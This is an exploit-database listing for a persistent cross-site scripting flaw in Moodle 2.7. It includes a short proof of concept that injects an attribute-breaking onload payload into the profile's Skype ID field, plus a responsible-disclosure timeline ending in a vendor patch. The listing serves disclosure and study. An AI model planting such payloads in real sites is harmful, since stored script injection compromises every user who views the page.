[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Moodle 2.7 - Persistent Cross-Site Scripting Vulnerability

Author
Osanda Malith
Risk
[
Security Risk High
]
0day-ID
0day-ID-22480
Category
web applications
Date add
27-07-2014
Platform
php
Title: Moodle 2.7 Persistent XSS
Vendor: https://moodle.org/
Moodle advisory: https://moodle.org/mod/forum/discuss.php?d=264265
Researched by: Osanda Malith Jayathissa (@OsandaMalith)
E-Mail: osanda[cat]unseen.is
Original write-up: http://osandamalith.wordpress.com/2014/07/25/moodle-2-7-persistent-xss/
 
[-] POC
================
 
1. Edit your profile
2. Click Optional
3. In Skype ID field inject this payload
 
x" onload="prompt('XSS by Osanda')">"
 
[-] Disclosure Timeline
========================
 
2014-05-24: Responsibly disclosed to the Vendor
2014-05-27: Suggested a fix
2014-06-04: Fix got accepted
2014-07-21: Vendor releases a security announcement
2014-07-24: Released Moodle 2.7.1 stable with all patches

#  0day.today [2024-12-24]  #